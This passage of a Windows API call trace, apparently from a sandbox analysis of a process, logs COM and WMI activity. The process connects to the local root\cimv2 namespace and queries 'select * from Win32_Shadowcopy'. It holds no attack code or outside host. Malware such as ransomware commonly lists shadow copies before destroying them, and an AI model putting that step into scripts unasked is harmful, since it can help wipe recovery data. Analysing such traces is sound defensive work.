ppvObject=0x1c64c3f0*=0x1c8e1490) returned 0x0 [0107.178] WbemDefPath:IUnknown:Release (This=0x1c8e1490) returned 0x2 [0107.178] WbemDefPath:IUnknown:Release (This=0x1c8e1490) returned 0x1 [0107.186] CoGetContextToken (in: pToken=0x1c64c510 | out: pToken=0x1c64c510) returned 0x0 [0107.186] CoGetContextToken (in: pToken=0x1c64c450 | out: pToken=0x1c64c450) returned 0x0 [0107.186] WbemDefPath:IUnknown:AddRef (This=0x1c8e1490) returned 0x2 [0107.186] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8e1490, riid=0x1c64c590*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c570 | out: ppvObject=0x1c64c570*=0x1c8e1490) returned 0x0 [0107.186] WbemDefPath:IUnknown:Release (This=0x1c8e1490) returned 0x2 [0107.186] WbemDefPath:IUnknown:AddRef (This=0x1c8e1490) returned 0x3 [0107.187] WbemDefPath:IWbemPath:SetText (This=0x1c8e1490, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0107.187] WbemDefPath:IUnknown:Release (This=0x1c8e1490) returned 0x2 [0107.187] CoGetContextToken (in: pToken=0x1c64d590 | out: pToken=0x1c64d590) returned 0x0 [0107.187] CoGetContextToken (in: pToken=0x1c64d4d0 | out: pToken=0x1c64d4d0) returned 0x0 [0107.187] WbemDefPath:IUnknown:AddRef (This=0x1c8e1390) returned 0x2 [0107.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8e1390, riid=0x1c64d610*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5f0 | out: ppvObject=0x1c64d5f0*=0x1c8e1390) returned 0x0 [0107.187] WbemDefPath:IUnknown:Release (This=0x1c8e1390) returned 0x2 [0107.187] WbemDefPath:IUnknown:AddRef (This=0x1c8e1390) returned 0x3 [0107.187] WbemDefPath:IWbemPath:SetText (This=0x1c8e1390, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0 [0107.188] WbemDefPath:IUnknown:Release (This=0x1c8e1390) returned 0x2 [0107.188] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d8a0 | out: puCount=0x1c64d8a0*=0x2) returned 0x0 [0107.188] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d8a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d8a0*=0x17, pszText=0x0) returned 0x0 [0107.189] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d8a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d8a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0107.192] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d850 | out: puCount=0x1c64d850*=0x2) returned 0x0 [0107.192] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d850*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d850*=0x17, pszText=0x0) returned 0x0 [0107.192] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d850*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d850*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0107.240] CoGetObjectContext (in: riid=0x1c64d788*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d780 | out: ppv=0x1c64d780*=0x212498) returned 0x0 [0107.240] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d7a0 | out: pAptType=0x1c64d7a0*=1) returned 0x0 [0107.240] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d8a8 | out: ppvObject=0x1c64d8a8*=0x0) returned 0x80004002 [0107.240] IUnknown:Release (This=0x212498) returned 0x1 [0107.241] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x1c64d5c0 | out: lpiid=0x1c64d5c0) returned 0x0 [0107.241] CoGetClassObject (in: rclsid=0x1b773c68*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d430 | out: ppv=0x1c64d430*=0x1c8e17d0) returned 0x0 [0107.301] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8e17d0, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64d140 | out: ppvObject=0x1c64d140*=0x0) returned 0x80004002 [0107.301] WbemLocator:IClassFactory:CreateInstance (in: This=0x1c8e17d0, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64d128 | out: ppvObject=0x1c64d128*=0x1c8f16b0) returned 0x0 [0107.301] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8f16b0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64d030 | out: ppvObject=0x1c64d030*=0x1c8f16b0) returned 0x0 [0107.302] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8f16b0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64d0b0 | out: ppvObject=0x1c64d0b0*=0x0) returned 0x80004002 [0107.302] WbemLocator:IUnknown:AddRef (This=0x1c8f16b0) returned 0x3 [0107.302] CoGetContextToken (in: pToken=0x1c64cd00 | out: pToken=0x1c64cd00) returned 0x0 [0107.302] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8f16b0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64ccc0 | out: ppvObject=0x1c64ccc0*=0x0) returned 0x80004002 [0107.302] CoGetContextToken (in: pToken=0x1c64ccd0 | out: pToken=0x1c64ccd0) returned 0x0 [0107.302] WbemLocator:IUnknown:AddRef (This=0x1c8f16b0) returned 0x4 [0107.302] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8f16b0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cde8 | out: ppvObject=0x1c64cde8*=0x0) returned 0x80004002 [0107.302] WbemLocator:IUnknown:Release (This=0x1c8f16b0) returned 0x3 [0107.302] WbemLocator:IUnknown:Release (This=0x1c8f16b0) returned 0x2 [0107.302] WbemLocator:IUnknown:Release (This=0x1c8e17d0) returned 0x0 [0107.303] WbemLocator:IUnknown:Release (This=0x1c8f16b0) returned 0x1 [0107.304] CoGetContextToken (in: pToken=0x1c64d2f0 | out: pToken=0x1c64d2f0) returned 0x0 [0107.304] CoGetContextToken (in: pToken=0x1c64d230 | out: pToken=0x1c64d230) returned 0x0 [0107.304] WbemLocator:IUnknown:AddRef (This=0x1c8f16b0) returned 0x2 [0107.304] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8f16b0, riid=0x1c64d370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64d350 | out: ppvObject=0x1c64d350*=0x1c8f16b0) returned 0x0 [0107.304] WbemLocator:IUnknown:Release (This=0x1c8f16b0) returned 0x2 [0107.304] WbemLocator:IUnknown:Release (This=0x1c8f16b0) returned 0x1 [0107.304] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d750 | out: puCount=0x1c64d750*=0x2) returned 0x0 [0107.304] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=8, puBuffLength=0x1c64d750*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d750*=0x17, pszText=0x0) returned 0x0 [0107.304] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=8, puBuffLength=0x1c64d750*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d750*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0107.310] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c64d440 | out: ppv=0x1c64d440*=0x1c8f1720) returned 0x0 [0107.310] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c8f1720, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c64d6d0 | out: ppNamespace=0x1c64d6d0*=0x1c8f44f8) returned 0x0 [0107.725] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8f44f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64d2b8 | out: ppvObject=0x1c64d2b8*=0x1b797ca0) returned 0x0 [0107.725] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b797ca0, pProxy=0x1c8f44f8, pAuthnSvc=0x1c64d2b0, pAuthzSvc=0x1c64d2ac, pServerPrincName=0x1c64d2d8, pAuthnLevel=0x1c64d2a8, pImpLevel=0x1c64d2c4, pAuthInfo=0x1c64d2e8, pCapabilites=0x1c64d2c0 | out: pAuthnSvc=0x1c64d2b0*=0xa, pAuthzSvc=0x1c64d2ac*=0x0, pServerPrincName=0x1c64d2d8, pAuthnLevel=0x1c64d2a8*=0x6, pImpLevel=0x1c64d2c4*=0x2, pAuthInfo=0x1c64d2e8, pCapabilites=0x1c64d2c0*=0x1) returned 0x0 [0107.725] WbemLocator:IUnknown:Release (This=0x1b797ca0) returned 0x1 [0107.725] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8f44f8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64d258 | out: ppvObject=0x1c64d258*=0x1b797ce0) returned 0x0 [0107.725] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8f44f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64d1e8 | out: ppvObject=0x1c64d1e8*=0x1b797ca0) returned 0x0 [0107.725] WbemLocator:IClientSecurity:SetBlanket (This=0x1b797ca0, pProxy=0x1c8f44f8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0107.725] WbemLocator:IUnknown:Release (This=0x1b797ca0) returned 0x2 [0107.725] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x1 [0107.725] CoTaskMemFree (pv=0x1b795250) [0107.726] WbemLocator:IUnknown:Release (This=0x1c8f1720) returned 0x0 [0107.726] WbemLocator:IUnknown:QueryInterface (in: This=0x1c8f44f8, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64ced0 | out: ppvObject=0x1c64ced0*=0x1b797ce0) returned 0x0 [0107.726] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cf50 | out: ppvObject=0x1c64cf50*=0x0) returned 0x80004002 [0107.726] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cce8 | out: ppvObject=0x1c64cce8*=0x0) returned 0x80004002 [0107.727] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0107.727] CoGetContextToken (in: pToken=0x1c64cba0 | out: pToken=0x1c64cba0) returned 0x0 [0107.727] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cb60 | out: ppvObject=0x1c64cb60*=0x1b797bc8) returned 0x0 [0107.727] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b797bc8, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64cb90 | out: pCid=0x1c64cb90*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0107.727] WbemLocator:IUnknown:Release (This=0x1b797bc8) returned 0x3 [0107.727] CoGetContextToken (in: pToken=0x1c64cb70 | out: pToken=0x1c64cb70) returned 0x0 [0107.727] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x4 [0107.727] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cc88 | out: ppvObject=0x1c64cc88*=0x1b797cb0) returned 0x0 [0107.728] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x4 [0107.728] WbemLocator:IRpcOptions:Query (in: This=0x1b797cb0, pPrx=0x1b797ce0, dwProperty=2, pdwValue=0x1c64ccf8 | out: pdwValue=0x1c64ccf8) returned 0x80004002 [0107.728] WbemLocator:IUnknown:Release (This=0x1b797cb0) returned 0x3 [0107.729] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0107.729] CoGetContextToken (in: pToken=0x1c64d070 | out: pToken=0x1c64d070) returned 0x0 [0107.729] CoGetContextToken (in: pToken=0x1c64cfb0 | out: pToken=0x1c64cfb0) returned 0x0 [0107.729] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0107.729] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x1c64d0f0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c64d0d0 | out: ppvObject=0x1c64d0d0*=0x1c8f44f8) returned 0x0 [0107.729] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0107.729] WbemLocator:IUnknown:Release (This=0x1c8f44f8) returned 0x2 [0107.731] WbemLocator:IUnknown:Release (This=0x1c8f44f8) returned 0x1 [0107.731] CoGetContextToken (in: pToken=0x1c64d670 | out: pToken=0x1c64d670) returned 0x0 [0107.731] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x2 [0107.731] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64d240 | out: ppvObject=0x1c64d240*=0x1b797ce0) returned 0x0 [0107.731] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0107.732] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x1 [0107.732] CoGetContextToken (in: pToken=0x1c64d310 | out: pToken=0x1c64d310) returned 0x0 [0107.732] CoGetContextToken (in: pToken=0x1c64d250 | out: pToken=0x1c64d250) returned 0x0 [0107.732] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x2 [0107.732] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x1c64d390*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c64d370 | out: ppvObject=0x1c64d370*=0x1c8f44f8) returned 0x0 [0107.732] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0107.732] WbemLocator:IUnknown:AddRef (This=0x1c8f44f8) returned 0x3 [0107.732] IWbemServices:ExecQuery (in: This=0x1c8f44f8, strQueryLanguage="WQL", strQuery="select * from Win32_Shadowcopy", lFlags=16, pCtx=0x0, ppEnum=0x1c64d808 | out: ppEnum=0x1c64d808*=0x1c8f45f8) returned 0x0 [0107.737] IUnknown:QueryInterface (in: This=0x1c8f45f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64d418 | out: ppvObject=0x1c64d418*=0x1c8f4600) returned 0x0 [0107.737] IClientSecurity:QueryBlanket (in: This=0x1c8f4600, pProxy=0x1c8f45f8, pAuthnSvc=0x1c64d410, pAuthzSvc=0x1c64d40c, pServerPrincName=0x1c64d438, pAuthnLevel=0x1c64d408, pImpLevel=0x1c64d424, pAuthInfo=0x1c64d448, pCapabilites=0x1c64d420 | out: pAuthnSvc=0x1c64d410*=0xa, pAuthzSvc=0x1c64d40c*=0x0, pServerPrincName=0x1c64d438, pAuthnLevel=0x1c64d408*=0x6, pImpLevel=0x1c64d424*=0x2, pAuthInfo=0x1c64d448, pCapabilites=0x1c64d420*=0x1) returned 0x0 [0107.737] IUnknown:Release (This=0x1c8f4600) returned 0x1 [0107.737] IUnknown:QueryInterface (in: This=0x1c8f45f8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64d3b8 | out: ppvObject=0x1c64d3b8*=0x1b7974a0) returned 0x0 [0107.737] IUnknown:QueryInterface (in: This=0x1c8f45f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64d348 | out: ppvObject=0x1c64d348*=0x1c8f4600) returned 0x0 [0107.738] IClientSecurity:SetBlanket (This=0x1c8f4600, pProxy=0x1c8f45f8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0107.740] IUnknown:Release (This=0x1c8f4600) returned 0x2 [0107.740] WbemLocator:IUnknown:Release (This=0x1b7974a0) returned 0x1 [0107.740] CoTaskMemFree (pv=0x1b795280) [0107.740] IUnknown:QueryInterface (in: This=0x1c8f45f8, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cff0 | out: ppvObject=0x1c64cff0*=0x1b7974a0) returned 0x0 [0107.740] WbemLocator:IUnknown:QueryInterface (in: This=0x1b7974a0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64d070 | out: ppvObject=0x1c64d070*=0x0) returned 0x80004002 [0107.741] WbemLocator:IUnknown:QueryInterface (in: This=0x1b7974a0, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64ce08 | out: ppvObject=0x1c64ce08*=0x0) returned 0x80004002 [0107.741] WbemLocator:IUnknown:AddRef (This=0x1b7974a0) returned 0x3 [0107.741] CoGetContextToken (in: pToken=0x1c64ccc0 | out: pToken=0x1c64ccc0) returned 0x0 [0107.742] WbemLocator:IUnknown:QueryInterface (in: This=0x1b7974a0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cc80 | out: ppvObject=0x1c64cc80*=0x1b797388) returned 0x0 [0107.742] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b797388, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64ccb0 | out: pCid=0x1c64ccb0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0107.742] WbemLocator:IUnknown:Release (This=0x1b797388) returned 0x3 [0107.742] CoGetContextToken (in: pToken=0x1c64cc90 | out: pToken=0x1c64cc90) returned 0x0 [0107.742] WbemLocator:IUnknown:AddRef (This=0x1b7974a0) returned 0x4 [0107.742] WbemLocator:IUnknown:QueryInterface (in: This=0x1b7974a0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cda8 | out: ppvObject=0x1c64cda8*=0x1b797470) returned 0x0 [0107.742] WbemLocator:IUnknown:Release (This=0x1b7974a0) returned 0x4 [0107.742] WbemLocator:IRpcOptions:Query (in: This=0x1b797470, pPrx=0x1b7974a0, dwProperty=2, pdwValue=0x1c64ce18 | out: pdwValue=0x1c64ce18) returned 0x80004002 [0107.742] WbemLocator:IUnknown:Release (This=0x1b797470) returned 0x3 [0107.743] WbemLocator:IUnknown:Release (This=0x1b7974a0) returned 0x2 [0107.743] CoGetContextToken (in: pToken=0x1c64d190 | out: pToken=0x1c64d190) returned 0x0 [0107.743] CoGetContextToken (in: pToken=0x1c64d0d0 | out: pToken=0x1c64d0d0) returned 0x0 [0107.743] WbemLocator:IUnknown:AddRef (This=0x1b7974a0) returned 0x3 [0107.743] WbemLocator:IUnknown:QueryInterface (in: This=0x1b7974a0, riid=0x1c64d210*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c64d1f0 | out: ppvObject=0x1c64d1f0*=0x1c8f45f8) returned 0x0 [0107.743] WbemLocator:IUnknown:Release (This=0x1b7974a0) returned 0x3 [0107.743] IUnknown:Release (This=0x1c8f45f8) returned 0x2 [0107.743] IUnknown:Release (This=0x1c8f45f8) returned 0x1 [0107.743] WbemLocator:IUnknown:Release (This=0x1c8f44f8) returned 0x2 [0107.743] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d7b0 | out: puCount=0x1c64d7b0*=0x2) returned 0x0 [0107.744] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d7b0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d7b0*=0x17, pszText=0x0) returned 0x0 [0107.744] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d7b0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d7b0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0107.745] CoGetContextToken (in: pToken=0x1c64d3b0 | out: pToken=0x1c64d3b0) returned 0x0 [0107.745] CoGetContextToken (in: pToken=0x1c64d2f0 | out: pToken=0x1c64d2f0) returned 0x0 [0107.746] WbemLocator:IUnknown:AddRef (This=0x1b7974a0) returned 0x2 [0107.746] WbemLocator:IUnknown:QueryInterface (in: This=0x1b7974a0, riid=0x1c64d430*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c64d410 | out: ppvObject=0x1c64d410*=0x1c8f45f8) returned 0x0 [0107.746] WbemLocator:IUnknown:Release (This=0x1b7974a0) returned 0x2 [0107.746] IUnknown:AddRef (This=0x1c8f45f8) returned 0x3 [0107.746] IEnumWbemClassObject:Clone (in: This=0x1c8f45f8, ppEnum=0x1c64d870 | out: ppEnum=0x1c64d870*=0x1c8f4788) returned 0x0 [0107.756] IUnknown:QueryInterface (in: This=0x1c8f4788, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64d4c8 | out: ppvObject=0x1c64d4c8*=0x1c8f4790) returned 0x0 [0107.756] IClientSecurity:QueryBlanket (in: This=0x1c8f4790, pProxy=0x1c8f4788, pAuthnSvc=0x1c64d4c0, pAuthzSvc=0x1c64d4bc, pServerPrincName=0x1c64d4e8, pAuthnLevel=0x1c64d4b8, pImpLevel=0x1c64d4d4, pAuthInfo=0x1c64d4f8, pCapabilites=0x1c64d4d0 | out: pAuthnSvc=0x1c64d4c0*=0xa, pAuthzSvc=0x1c64d4bc*=0x0, pServerPrincName=0x1c64d4e8, pAuthnLevel=0x1c64d4b8*=0x6, pImpLevel=0x1c64d4d4*=0x2, pAuthInfo=0x1c64d4f8, pCapabilites=0x1c64d4d0*=0x1) returned 0x0 [0107.756] IUnknown:Release (This=0x1c8f4790) returned 0x1 [0107.756] IUnknown:QueryInterface (in: This=0x1c8f4788, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, 